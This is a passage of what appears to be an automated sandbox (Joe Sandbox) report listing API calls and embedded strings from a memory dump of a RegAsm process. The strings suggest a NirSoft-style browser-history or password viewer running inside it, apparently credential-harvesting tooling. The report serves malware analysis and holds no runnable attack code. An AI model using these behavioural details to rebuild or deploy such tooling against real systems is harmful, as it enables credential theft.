                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                          • wcschr.MSVCRT ref: 0040E3B8
                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                          Similarity
                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                          • _snwprintf.MSVCRT ref: 0044488A
                                          • wcscpy.MSVCRT ref: 004448B4
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                          Similarity
                                          • API ID: ??2@??3@_snwprintfwcscpy
                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                          APIs
                                          • memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                          • memcmp.MSVCRT ref: 004092D9
                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                          • memcmp.MSVCRT ref: 0040933B
                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                          • memcmp.MSVCRT ref: 00409411
                                          • memcmp.MSVCRT ref: 00409429
                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                          • memcmp.MSVCRT ref: 004094AC
                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                          Similarity
                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                          • String ID:
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          • memset.MSVCRT ref: 004085CF
                                          • memset.MSVCRT ref: 004085F1
                                          • memset.MSVCRT ref: 00408606
                                          • strcmp.MSVCRT ref: 00408645
                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                          • memset.MSVCRT ref: 0040870E
                                          • strcmp.MSVCRT ref: 0040876B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                          • CloseHandle.KERNEL32(?), ref: 004087A6
                                          Similarity
                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                          • String ID: ---
                                          APIs
                                          • memset.MSVCRT ref: 0041087D
                                          • memset.MSVCRT ref: 00410892
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                          • DeleteObject.GDI32(?), ref: 004109D0
                                          • DeleteObject.GDI32(?), ref: 004109D6
                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                          Similarity
                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          APIs
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                          • malloc.MSVCRT ref: 004186B7
                                          • free.MSVCRT ref: 004186C7
                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                          • free.MSVCRT ref: 004186E0
                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                          • malloc.MSVCRT ref: 004186FE
                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                          • free.MSVCRT ref: 00418716
                                          • free.MSVCRT ref: 0041872A
                                          • free.MSVCRT ref: 00418749
                                          Similarity
                                          • API ID: free$FullNamePath$malloc$Version
                                          • String ID: |A
                                          APIs
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          APIs
                                          • GetDC.USER32(00000000), ref: 004121FF
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                          • SelectObject.GDI32(?,?), ref: 00412251
                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                          • SetCursor.USER32(00000000), ref: 004122BC
                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                          Similarity
                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                          • String ID:
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: %%0.%df
                                          APIs
                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                          • GetTickCount.KERNEL32 ref: 0040610B
                                          • GetParent.USER32(?), ref: 00406136
                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                          Similarity
                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                          • String ID: A
                                          APIs
                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                          • memset.MSVCRT ref: 0040DA23
                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                          Similarity
                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                          • String ID: caption
                                          APIs
                                          Strings
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                          Similarity
                                          • API ID: memset$_snwprintf$wcscpy
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                          APIs
                                          • wcschr.MSVCRT ref: 00413972
                                          • wcscpy.MSVCRT ref: 00413982
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                          • wcscpy.MSVCRT ref: 004139D1
                                          • wcscat.MSVCRT ref: 004139DC
                                          • memset.MSVCRT ref: 004139B8
                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                          • memset.MSVCRT ref: 00413A00
                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                          • wcscat.MSVCRT ref: 00413A27
                                          Similarity
                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                          • String ID: \systemroot
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                          APIs
                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                          • strchr.MSVCRT ref: 0040C140
                                          • strchr.MSVCRT ref: 0040C151
                                          • _strlwr.MSVCRT ref: 0040C15F
                                          • memset.MSVCRT ref: 0040C17A
                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                          Similarity
                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                          • String ID: 4$h
                                          APIs
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                          • String ID: 0$6
                                          APIs
                                          • memset.MSVCRT ref: 004082EF
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • memset.MSVCRT ref: 00408362
                                          • memset.MSVCRT ref: 00408377
                                          Similarity
                                          • API ID: memset$ByteCharMultiWide
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: free$wcslen
                                          • String ID:
                                          APIs
                                          • memset.MSVCRT ref: 0040A47B
                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                          • wcslen.MSVCRT ref: 0040A4BA
                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                          • wcslen.MSVCRT ref: 0040A4E0
                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                          Similarity
                                          • API ID: memcpywcslen$_snwprintfmemset
                                          • String ID: %s (%s)$YV@
                                          APIs
                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                          • wcslen.MSVCRT ref: 0040A6B1
                                          • wcscpy.MSVCRT ref: 0040A6C1
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                          • wcscpy.MSVCRT ref: 0040A6DB
                                          Similarity
                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                          • String ID: Unknown Error$netmsg.dll
                                          APIs
                                          Strings
                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                          • unable to open database: %s, xrefs: 0042F84E
                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                          • out of memory, xrefs: 0042F865
                                          • database %s is already in use, xrefs: 0042F6C5
                                          • database is already attached, xrefs: 0042F721
                                          • too many attached databases - max %d, xrefs: 0042F64D
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                          • API String ID: 1297977491-2001300268
                                          APIs
                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                          • GetLastError.KERNEL32 ref: 004178FB
                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                          Similarity
                                          • API ID: File$ErrorLastLockSleepUnlock
                                          • String ID:
                                          • API String ID: 3015003838-0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                          • wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                          • wcslen.MSVCRT ref: 0040D1D3
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                          Similarity
                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                          • String ID: strings
                                          • API String ID: 3166385802-3030018805
                                          APIs
                                          • memset.MSVCRT ref: 0040D8BD
                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                          • memset.MSVCRT ref: 0040D906
                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                          • String ID: sysdatetimepick32
                                          • API String ID: 1028950076-4169760276
                                          APIs
                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          Similarity
                                          • API ID: Library$FreeLoadMessage
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 3897320386-317687271
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                          Similarity
                                          • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                          • API String ID: 4271163124-70141382
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 4139908857-3953557276
                                          APIs
                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                          • memset.MSVCRT ref: 0041BA3D
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: -journal$-wal
                                          • API String ID: 438689982-2894717839
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                          • GetTickCount.KERNEL32 ref: 0041887D
                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                          Similarity
                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                          • String ID:
                                          • API String ID: 4218492932-0
                                          APIs
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: gj
                                          • API String ID: 438689982-4203073231
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                          • memset.MSVCRT ref: 00405ABB
                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                          • SetFocus.USER32(?), ref: 00405B76
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          Similarity
                                          • API ID: _snwprintfwcscat
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 384018552-4153097237
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                          • String ID: 0$6
                                          • API String ID: 2029023288-3849865405
                                          APIs
                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                          • memset.MSVCRT ref: 00405455
                                          • memset.MSVCRT ref: 0040546C
                                          • memset.MSVCRT ref: 00405483
                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                          Similarity
                                          • API ID: memset$memcpy$ErrorLast
                                          • String ID: 6$\
                                          • API String ID: 404372293-1284684873
                                          Similarity
                                          • API ID: AttributesErrorFileLastSleep$free
                                          • String ID:
                                          • API String ID: 1470729244-0
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                          • wcscpy.MSVCRT ref: 0040A0D9
                                          • wcscat.MSVCRT ref: 0040A0E6
                                          • wcscat.MSVCRT ref: 0040A0F5
                                          • wcscpy.MSVCRT ref: 0040A107
                                          Similarity
                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                          • String ID:
                                          • API String ID: 1331804452-0
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                          • <%s>, xrefs: 004100A6
                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3473751417-2880344631
                                          Similarity
                                          • API ID: wcscat$_snwprintfmemset
                                          • String ID: %2.2X
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscpy
                                          • String ID: dialog_%d$general$menu_%d$strings
                                          APIs
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                          • memset.MSVCRT ref: 0040C439
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                          • _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          • memset.MSVCRT ref: 0040C4D0
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                          • String ID:
                                          APIs
                                          • memset.MSVCRT ref: 004116FF
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
